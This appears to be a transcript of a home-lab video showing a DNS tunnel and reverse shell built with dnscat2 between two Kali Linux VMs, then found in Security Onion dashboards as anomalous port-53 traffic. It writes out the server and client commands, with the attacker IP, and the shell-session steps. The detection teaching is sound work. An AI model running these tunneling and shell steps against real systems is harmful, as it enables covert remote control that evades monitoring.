Hello folks, and welcome to the SO Hacker Log. I am your script kiddie in security land, and this is my network that is being monitored by Security Onion. If you want to learn how to monitor a small network at home using Security Onion, then see the link down in the description. In this episode, I am going to do some DNS tunneling so we can see what that looks like in Security Onion. Okay, so let's go ahead and get started. So in the background here, I have a Windows host that is running Kali Linux in a virtual machine. And down in the lower left-hand corner, I have a Linux host that is also running another instance of Kali Linux in another virtual machine. Now in the Windows host here, I have the Security Onion console open in a web browser, and I have the update frequency set to 1 minute. And as you can see, Security Onion is already alerting me here that there are instances of Kali Linux on this network. So that is a good thing. If Kali Linux is on your network and it's not you that put it there, that is definitely a red flag. Now, in both of these instances of Kali Linux, I have also cloned DNS from GitHub into them, and I have the command for that down in the description for this video. Now, one of these Kali machines is going to be the attacker, and the other one is going to be the victim. Now, in this example, it really doesn't matter which one you use, but I am going to be using the Kali Linux that is running on top of Ubuntu here as the attacker, and I'm going to use the Kali Linux that is running on top of Windows as the victim. And even that is a kind of arbitrary thing to be calling them, really. I am going to be executing a shell remotely through DNS traffic on the victim machine from the attacker machine, and that's why I'm calling them that. Now, on the attacking machine here, I need to run the DNS server. So I am going to navigate to the DNS folder right here. And then I'm going to right-click and run a terminal in that folder. I'm going to list the contents of that directory, and then I am going to go ahead and cd into the server subdirectory here. Then I am going to issue the command sudo bundle install. And it's going to ask me for the Kali Linux password, so I'm going to type that in. And that command didn't work because this subnet is not connected to the internet. So I was planning on leaving it not connected to the internet, but I'm going to go ahead and connect it to the internet so that this command will work. And now when I execute that command, Kali Linux will download and install some additional software here. Now on the victim machine, I am also going to open up the DNS folder here, and I am once again going to right-click and open a terminal window in this directory. Now, this time I am going to navigate to the client folder. And from there, I am just going to type the command make. That will cause it to spend a few moments compiling the client software here, and then we are ready to go. Okay, so back at the attacking machine now, I am just going to start the server. And I do that by writing the command ruby./dnscat2.rb. And that starts the server. Now, after I do that, it basically informs me here that I'm an amateur, but that's okay for this demonstration that we're doing here. And now I can actually connect to this server from the client. So now back at the victim machine here, I need to connect using the server's IP address. So if I go look at the clients table on my router, the attacking machine is this one right here. So the IP address is 192.168.8.104. So that's what I'm going to use. So this is the same terminal on the victim machine where I've just cleared the output. And I am going to type the command ./DNSCat -DNS equals server equals 192.168.8.104. And that didn't work. And it gave me an unrecognized argument error, and that's because I used a dyslexic DNS here. So let me just fix that, and we'll execute this command now. Oh yes, and I need to put in port 53 at the end of it. Okay, so now we have a DNS tunnel between these two machines. And as you can see, so far, Security Onion has not generated any alerts based on this tunnel. So in this example, it is pretty stealthy so far. So we have this DNS tunneling happening now between these two machines, and I want to actually poke around in Security Onion here to see if I can find this anomalous behavior. Now, if you look at the alerts here, you can see that it is still not being alerted, and that is the point of this kind of a tunnel, because it looks like DNS traffic. So IDS systems like Security Onion are less likely to notice it. But this is not normal DNS traffic in the context of this network, because the only DNS server on this network is the main router. So the only DNS traffic that should be directed to port 53 anywhere on this network should be directed only to the router. And none of the other computers on this network should be trying to find DNS records from any of the other computers on this network. So this is definitely not normal traffic. So I'm going to dig in here and see if I can find this traffic and identify it and just sort of point it out as being abnormal traffic. Okay, so I'm going to go over to the left-hand side of the Security Onion console here, and I'm going to click on Dashboards. So I am going to scroll down in all of these statistics about the various events that are being recorded, and I am going to find DNS traffic, which is going to be on port 53. So as you can see, there is really quite a lot of DNS traffic, which is totally normal. So I am just going to click on port 53 right here, and I am going to add a search term for it so that we are filtering these results for traffic that is directed to port 53. As you can see, that has been added now as one of the search terms. So I am going to look through these results here and see if I can find this traffic. I'm also going to set the update frequency for this page to 1 minute, just so that we're seeing these results appear as they happen. Okay, so scrolling down the results of this page now, you can see that there really is quite a lot of DNS traffic, and again, that's completely normal. When we get down a little ways here, you can actually see this anomalous traffic right here, where there is 177 network events that are directed to the IP address 192.168.8.104. And again, the only DNS server on this network is the main router, which is at 192.168.8.1. So there shouldn't be any DNS traffic going anywhere else. So this is definitely anomalous here. And you can see that all of the other traffic, in fact, is directed to the actual DNS server. So I just barely established this tunnel. It's only been running for a minute or two, and you can already see that this traffic is identifiable as anomalous here, even though Security Onion isn't alerting us to it. And after this page refreshes, you can see that there's already quite a bit more traffic here. So a minute later, the page updates one more time, and we can see that this is an active connection of some kind that is occurring here. So we can also look at this as a pie chart here, and we can see that this traffic is starting to take up a tiny sliver of the pie here. And again, it should be nothing. So turning this back to a list again, we can see that this traffic is persistent here. Going back to the alerts page one more time here, you can see that Security Onion has still not alerted us to this traffic. So this is pretty stealthy so far, but not so stealthy that it cannot be detected. Okay, so I'm going to go back to the dashboards page here, and I am going to update our search one more time to include the IP address here of our DNS tunnel server. And when I do that, you can actually identify both the attacker and the victim in this case in the individual network events here. If I expand this list a little bit, you can see that all of the traffic in this list is between the same two hosts. Now, if we scroll back up a little bit here, we can see that all of the traffic actually that's happening is between these two hosts on the network. So you can actually see the attacker and the victim here on this network and identify that it is only two hosts that this traffic is happening between, and that is really not good. This cannot be anything but nefarious in this example. And there are still no alerts here. Okay, so I am going to go ahead and go back to the Kali Linux machines now and just finish establishing this shell just so that we have an active shell connection going back and forth between these two machines. Going back to the attacking machine here, I am going to type in help down here so I can get a list of commands. And I am just going to type in Windows here, and that will give me a list of active connections. And that's not super intuitive. I only know that because I watched another video where someone was establishing this shell through a DNS tunnel. And this cryptic output here does actually tell us some things. But what we need right here is that we have one active remote connection here. And kind of punnily, this very cryptic message literally has the word crypt in it 3 times. So the universe does kind of have a sense of humor. Okay, so now that I know the windows that we have available to us, I am going to actually just connect to window 1 here. And I do that with the window command. And the command is window-I1. And that connects me to the victim machine here, and it gives me the option to issue some commands. So what I'm going to do is actually run a shell. Now, as you can see, it has told me that it created a new window and that it has started a shell session for me. So unironically, this software is a little hacky, and I am not actually in the shell at the moment. So if I hit enter here, I'll be given a new prompt. And as you can see, I am still interacting with window 1 here. So here I am going to type the command back so that I can get back to the main DNS cat prompt here. If I type in the Windows command here again, now you can see that I have 2 windows open, and one of them is a shell on the victim machine here. Calling it victim does sound dramatic, doesn't it? I should probably start calling it righteous victim. Okay, so I am going to go ahead and log into this shell on the victim machine here so that I can start issuing shell commands. And the command for that is window-I2. And oops, okay, I put 1 in there instead, so I need to put an I. And as you can see, now I have a shell prompt on the victim machine. And as you can see, I can now enter standard Linux commands, and that machine will respond to me remotely. Now, this is a pretty buggy program. This doesn't really work that well, this shell, but we do have a reverse shell here to this client remotely. Now, as you can see back in Security Onion here, this has still not generated any alerts, so this is pretty stealthy in this example. The longer this goes on, however, the more apparent this anomalous behavior becomes. Also, it should be fairly straightforward to write detection rules for Suricata to detect this traffic and alert us to it so that we don't have to dig into this ourselves if something like this happens. But that is the subject for another video.